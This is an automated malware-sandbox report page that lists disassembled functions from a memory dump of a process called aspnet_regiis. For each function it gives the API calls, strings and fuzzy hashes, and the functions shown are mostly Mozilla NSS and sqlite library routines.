Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 674ffa9c90f86173df797eb52604ba025d5b427c38c150f55c9001b9797890ec
Instruction ID: a343b10c3cb2eb129f4e04870ddc909c60cfff8c186e262cabe7caae8e8dd4c5
Opcode Fuzzy Hash: 674ffa9c90f86173df797eb52604ba025d5b427c38c150f55c9001b9797890ec
Instruction Fuzzy Hash: 9B51F1B59042019FEB01EF64EC05EAA3AB4AF0535DF190538E88696F11F732E955CAD2

Function 6C3BACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3BACE2
malloc.MOZGLUE(00000001), ref: 6C3BACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C3BAD02
TlsGetValue.KERNEL32 ref: 6C3BAD3C
calloc.MOZGLUE(00000001,?), ref: 6C3BAD8C
PR_Unlock.NSS3 ref: 6C3BADC0
free.MOZGLUE(00000000), ref: 6C3BAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C3BAE58
free.MOZGLUE(00000000), ref: 6C3BAE69
free.MOZGLUE(?), ref: 6C3BAE78
PR_Unlock.NSS3 ref: 6C3BAE8C
free.MOZGLUE(?), ref: 6C3BAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C3BAEC7

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: c3c94fd89726572fbedc8beb6459cbe8cd6f39d3f61bcafb4c25b919ed444512
Instruction ID: bc588f6a484680421550300a1a403099fd55eb4ba6b0c81ea34006102c2b57d2
Opcode Fuzzy Hash: c3c94fd89726572fbedc8beb6459cbe8cd6f39d3f61bcafb4c25b919ed444512
Instruction Fuzzy Hash: 67516CB0A016169BDF00EF58CC45AAF77B8AB16349F160129E805B7F10D736B944CFEA

Function 6C494C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C494CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C494CFD
sqlite3_value_text16.NSS3(?), ref: 6C494D44

Strings

no more rows available, xrefs: 6C494D2E
unknown error, xrefs: 6C494D56
API call with %s database connection pointer, xrefs: 6C494CF6
another row available, xrefs: 6C494D20
out of memory, xrefs: 6C494C78, 6C494C9E
abort due to ROLLBACK, xrefs: 6C494D27, 6C494D33
invalid, xrefs: 6C494CF1
bad parameter or other API misuse, xrefs: 6C494D05

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 2fef1467c4d3641f452083fd6ef2f0a9980af7b10e083fb54b070c1600462ee6
Instruction ID: cb02dde94a3e0d1c38290fef147b0e8611802e8483321522db5dae96f35d135a
Opcode Fuzzy Hash: 2fef1467c4d3641f452083fd6ef2f0a9980af7b10e083fb54b070c1600462ee6
Instruction Fuzzy Hash: 70317A76E049326FE708CA24E815FA5BB717B8339AF172225D4344BF64D724AC1287E2

Function 6C3F2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C3F2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C3F2D07

Part of subcall function 6C4D09D0: PR_Now.NSS3 ref: 6C4D0A22
Part of subcall function 6C4D09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C4D0A35
Part of subcall function 6C4D09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C4D0A66
Part of subcall function 6C4D09D0: PR_GetCurrentThread.NSS3 ref: 6C4D0A70
Part of subcall function 6C4D09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C4D0A9D
Part of subcall function 6C4D09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C4D0AC8
Part of subcall function 6C4D09D0: PR_vsmprintf.NSS3(?,?), ref: 6C4D0AE8
Part of subcall function 6C4D09D0: EnterCriticalSection.KERNEL32(?), ref: 6C4D0B19
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4D0B48
Part of subcall function 6C4D09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4D0C76
Part of subcall function 6C4D09D0: PR_LogFlush.NSS3 ref: 6C4D0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C3F2D22

Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4D0B88
Part of subcall function 6C4D09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4D0C5D
Part of subcall function 6C4D09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C4D0C8D
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0C9C
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4D0CD1
Part of subcall function 6C4D09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C4D0CEC
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0CFB
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C4D0D16
Part of subcall function 6C4D09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C4D0D26
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0D35
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C4D0D65
Part of subcall function 6C4D09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C4D0D70
Part of subcall function 6C4D09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C4D0D90
Part of subcall function 6C4D09D0: free.MOZGLUE(00000000), ref: 6C4D0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C3F2D3B

Part of subcall function 6C4D09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C4D0BAB
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0BBA
Part of subcall function 6C4D09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C3F2D54

Part of subcall function 6C4D09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D0BCB
Part of subcall function 6C4D09D0: EnterCriticalSection.KERNEL32(?), ref: 6C4D0BDE
Part of subcall function 6C4D09D0: OutputDebugStringA.KERNEL32(?), ref: 6C4D0C16

Strings

C_InitToken, xrefs: 6C3F2CE7
nMl, xrefs: 6C3F2D6C, 6C3F2D9A
pPin = 0x%p, xrefs: 6C3F2D1D
slotID = 0x%x, xrefs: 6C3F2D02
pLabel = 0x%p, xrefs: 6C3F2D4F
ulPinLen = %d, xrefs: 6C3F2D36

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nMl
API String ID: 420000887-578899517
Opcode ID: 911fe6ac1f1963dfdcc806aa02f516ae13a6e215e6ea6b0c3a68c1db507c6bbb
Instruction ID: 49472b70e96d202eb4b13436fa968f94421a8663991ca4b8ac19cbf3ae4e9066
Opcode Fuzzy Hash: 911fe6ac1f1963dfdcc806aa02f516ae13a6e215e6ea6b0c3a68c1db507c6bbb
Instruction Fuzzy Hash: D721E579201180EFEB00EB50DE5DE493BF1EB8232DF464455F52497A21D7359809CFB6

Function 6C3C4880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3C48A2
PORT_NewArena_Util.NSS3(00000800), ref: 6C3C48C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C3C48D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C3C48FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C3C4908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C3C4947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C3C496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C3C4988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C4E8DAC,?), ref: 6C3C49DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3C49FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3C4ACB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: d5516ef92f12a50b0796d327d4a0e33d31cc0ced8cfdda551b849892c97f2290
Instruction ID: 528d04d6d2894a23c92679a1ffb0b94829be6c3c728434897649fb15c239c841
Opcode Fuzzy Hash: d5516ef92f12a50b0796d327d4a0e33d31cc0ced8cfdda551b849892c97f2290
Instruction Fuzzy Hash: 4251C075B003418BEB10CE659C81FAF76E8AF4130CF104129ED59AAB91EB72DC548FA7

Function 6C492D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C492D9F

Part of subcall function 6C34CA30: EnterCriticalSection.KERNEL32(?,?,?,6C3AF9C9,?,6C3AF4DA,6C3AF9C9,?,?,6C37369A), ref: 6C34CA7A
Part of subcall function 6C34CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C34CB26

sqlite3_exec.NSS3(?,?,6C492F70,?,?), ref: 6C492DF9
sqlite3_free.NSS3(00000000), ref: 6C492E2C
sqlite3_free.NSS3(?), ref: 6C492E3A
sqlite3_free.NSS3(?), ref: 6C492E52
sqlite3_mprintf.NSS3(6C4FAAF9,?), ref: 6C492E62
sqlite3_free.NSS3(?), ref: 6C492E70
sqlite3_free.NSS3(?), ref: 6C492E89
sqlite3_free.NSS3(?), ref: 6C492EBB
sqlite3_free.NSS3(?), ref: 6C492ECB
sqlite3_free.NSS3(00000000), ref: 6C492F3E
sqlite3_free.NSS3(?), ref: 6C492F4C

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 78b3c8a821ccfe65b79bb3a5c6457d317c8695876dd6cc9d567c6735f12fb3bf
Instruction ID: 741625249e91cbef12c9fe89ce0f6ac07a3eda73789f16e967d251421031e684
Opcode Fuzzy Hash: 78b3c8a821ccfe65b79bb3a5c6457d317c8695876dd6cc9d567c6735f12fb3bf
Instruction Fuzzy Hash: 84616AB5E012158FEF20CFA8D884F9EBBB5AF48349F144028DC55A7B11EB31E845CBA1

Function 6C344C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CB0
PR_Unlock.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344D97
PR_Lock.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344DBA
PR_WaitCondVar.NSS3 ref: 6C344DD4
PR_Unlock.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C343921,6C5214E4,6C48CC70), ref: 6C344DEF

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: c28c9ebbe689f630ff3f40ac6839f68165ce34a0513c8b163045bfa4a4fe43b6
Instruction ID: cb327329091d604d9a5477b2b2104168a25bc87be468d81300aa68f1775f9da4
Opcode Fuzzy Hash: c28c9ebbe689f630ff3f40ac6839f68165ce34a0513c8b163045bfa4a4fe43b6
Instruction Fuzzy Hash: 38417DB5A04615CFCB00FF79C48895ABBF4BF06358B068679D8889BB11E731E884CF95

Function 6C3E8F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C3E9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C3E9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C3E9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C3E90EC

Part of subcall function 6C3B0F00: PR_GetPageSize.NSS3(6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F1B
Part of subcall function 6C3B0F00: PR_NewLogModule.NSS3(clock,6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C3E9111

Strings

nMl, xrefs: 6C3E90A3

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nMl
API String ID: 2831689957-2700914739
Opcode ID: 9ba1d4c1b7ab883b706e7d5fda14038ab94d5a34be24f4fcfc5417858f8062c0
Instruction ID: 55bd3e26f4fb838a694059f114fff5865b178df196b8822ab3d468f929daccbd
Opcode Fuzzy Hash: 9ba1d4c1b7ab883b706e7d5fda14038ab94d5a34be24f4fcfc5417858f8062c0
Instruction Fuzzy Hash: 65519E74A043158FDB00EF38C888A99BBF4BF09318F46456ADC459BB05EB36E885CF91

Function 6C3CE910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C3CE93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6C3CE94E
PORT_Alloc_Util.NSS3(00000001), ref: 6C3CE995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C3CE9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C3CE9CA
PORT_Strdup_Util.NSS3(6C50933E), ref: 6C3CEA17
PORT_Alloc_Util.NSS3(00000001), ref: 6C3CEA28

Part of subcall function 6C420BE0: malloc.MOZGLUE(6C418D2D,?,00000000,?), ref: 6C420BF8
Part of subcall function 6C420BE0: TlsGetValue.KERNEL32(6C418D2D,?,00000000,?), ref: 6C420C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C3CEA3C
free.MOZGLUE(?), ref: 6C3CEA69

Strings

http://, xrefs: 6C3CE935

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: 1187f9a944197c24eba043a1aba749d9fdec2f5544c74223c9f4a81c99126403
Instruction ID: 61ca3c24b4c6cf846c5138f406ab646a6cf7a1521e41bb053b2dd42380e4ceb7
Opcode Fuzzy Hash: 1187f9a944197c24eba043a1aba749d9fdec2f5544c74223c9f4a81c99126403
Instruction Fuzzy Hash: 84417D75B447064BDB608AA88C43BEE77A9AB0730CF140025DC9497F41E21B9D46CEE7

Function 6C3E4E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3E4E90
EnterCriticalSection.KERNEL32 ref: 6C3E4EA9
TlsGetValue.KERNEL32 ref: 6C3E4EC6
EnterCriticalSection.KERNEL32 ref: 6C3E4EDF
PL_HashTableLookup.NSS3 ref: 6C3E4EF8
PR_Unlock.NSS3 ref: 6C3E4F05
PR_Now.NSS3 ref: 6C3E4F13
PR_Unlock.NSS3 ref: 6C3E4F3A

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

Strings

bU>l, xrefs: 6C3E4E5C
bU>l, xrefs: 6C3E4F3F

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bU>l$bU>l
API String ID: 326028414-3303554329
Opcode ID: 019d19fb5413c6d53e3be5261b024cfa0d692ac833071c3b276ee7ae2790d8e8
Instruction ID: d85bd6c3127977acecc2dae4a08ddb70cd705803a0866359594ca249af985aad
Opcode Fuzzy Hash: 019d19fb5413c6d53e3be5261b024cfa0d692ac833071c3b276ee7ae2790d8e8
Instruction Fuzzy Hash: 96413AB4A00615CFCB00EF69C48586ABBF4FF4D304B158569DC999BB14EB31E895CF91

Function 6C3F6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C3F6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F6CA3

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C3F6CD5

Strings

pMechanism = 0x%p, xrefs: 6C3F6CD0
nMl, xrefs: 6C3F6CF4, 6C3F6D1F
(CK_INVALID_HANDLE), xrefs: 6C3F6C9C
C_DigestInit, xrefs: 6C3F6C61
hSession = 0x%x, xrefs: 6C3F6C7E, 6C3F6C8E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nMl
API String ID: 1003633598-1056916157
Opcode ID: d41cb8c2821c073dd272ed7f0ae137b0e3fad56381339736505ca52d327d4627
